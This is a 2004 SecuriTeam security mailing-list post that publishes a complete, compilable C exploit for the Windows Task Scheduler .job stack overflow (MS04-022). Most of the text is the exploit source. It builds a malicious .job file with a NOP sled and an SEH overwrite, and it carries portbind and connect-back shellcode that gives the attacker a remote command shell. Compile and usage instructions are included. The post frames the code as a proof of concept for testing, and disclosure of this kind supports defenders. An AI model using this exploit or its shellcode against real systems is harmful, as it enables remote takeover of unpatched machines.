[EXPL] Microsoft Windows XP Task Scheduler Universal Exploit (MS04-022)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/04/04
- Previous message: SecuriTeam: "[NT] Cumulative Security Update for Internet Explorer (MS04-025)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 4 Aug 2004 00:53:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Windows XP Task Scheduler Universal Exploit (MS04-022)
------------------------------------------------------------------------
SUMMARY
As we reported in,
<http://www.securiteam.com/windowsntfocus/5XP0E15DGK.html> Microsoft
Windows Task Scheduler '.job' Stack Overflow, a remote code execution
vulnerability exists in the Microsoft Windows Task Scheduler because of
the way that it handles application name validation.
The following exploit code can be used to test your system for the
mentioned vulnerability.
DETAILS
Affected Software:
* Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service
Pack 3, Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP and Microsoft Windows XP Service Pack 1
* Microsoft Windows XP 64-Bit Edition Service Pack 1
Exploit
--------------------------------- Begin Code: HOD-ms04022-task-expl.c
---------------------------------
/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job)
Universal Exploit
*
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
* - Internet Explorer 6.0 (SP1) (iexplore.exe)
* - Explorer (explorer.exe)
* - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl HOD-ms04022-task-expl.c
* Win32/cygwin: gcc HOD-ms04022-task-expl.c
-lws2_32.lib
* Linux : gcc -o HOD-ms04022-task-expl
HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD.exe <file> <shellcode> <bind/connectback port>
[connectback IP]
*
* Shellcode:
* 1 - Portbind shellcode
* 2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job)
Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Shellcode: Portbind, port = 7777
* [*] Generate file: expl.job
*
* C:\>
*
* start IE -> C:\
*
* C:\>telnet localhost 7777
* Microsoft Windows XP [?????? 5.1.2600]
* (?) ?????????? ??????????, 1985-2001.
*
* C:\Documents and Settings\v.X\??????? ????>
*
* -------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for
educational
* purposes and testing by authorized individuals with
permission to
* do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
unsigned char jobfile[] =
/* job header */
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
"\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00"
/* length */
"\x11\x11"
/* garbage C:\... */
/* unicode */
"\x43\x00\x3A\x00\x5C\x00\x61\x00"
"\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x1E\x82\xDC\x77"
/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx */
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x80\x31\x31\x80" /* generate exception */
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x90\x90";
/* portbind shellcode */
unsigned char portbindsc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";
/* connectback shellcode */
unsigned char connectbacksc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";
/* use this form
unsigned char sc[] =
"\x90\x90"
"\x90\x90\xEB\x06" - overwrite SEH-frame
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"... code ...";
*/
unsigned char endofjob[] = "\x00\x00\x00\x00";
#define SET_PORTBIND_PORT(buf, port) *(unsigned short
*)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned
long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned
short *)(((buf)+290+16)) = (port)
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <shellcode> <bind/connectback port>
[connectback IP]\n", prog);
printf("\nShellcode:\n");
printf(" 1 - Portbind shellcode\n");
printf(" 2 - Connectback shellcode\n\n");
exit(0);
}
int
main(int argc, char **argv)
{
unsigned short strlen;
unsigned short port;
unsigned long ip, sc;
FILE *fp, *fp2;
printf("\n(MS04-022) Microsoft Windows XP Task
Scheduler (.job) Universal Exploit\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
if (argc < 4) usage(argv[0]);
sc = atoi(argv[2]);
if ( ((sc == 2) && (argc < 5)) || (sc > 2))
usage(argv[0]);
fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can\'t create file: %s\n", argv[1]);
exit(0);
}
/* header & garbage */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fseek(fp, 39*16, SEEK_SET);
port = atoi(argv[3]);
printf("[*] Shellcode: ");
if (sc == 1) {
SET_PORTBIND_PORT(portbindsc, htons(port));
printf("Portbind, port = %u\n", port);
fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen =
(sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
}
else {
ip = inet_addr(argv[4]);
SET_CONNECTBACK_IP(connectbacksc, ip);
SET_CONNECTBACK_PORT(connectbacksc,
htons(port));
printf("Connectback, port = %u, IP = %s\n", port,
argv[4]);
fwrite(connectbacksc, 1, sizeof(connectbacksc)-1,
fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen =
(sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
}
printf("[*] Generate file: %s\n", argv[1]);
fwrite(&strlen, 1, 2, fp);
fclose(fp);
return 0;
}
---------------------------------- End Code: HOD-ms04022-task-expl.c
----------------------------------
ADDITIONAL INFORMATION
The information has been provided by <mailto:houseofdabus@inbox.ru>
houseofdabus HOD.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Cumulative Security Update for Internet Explorer (MS04-025)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
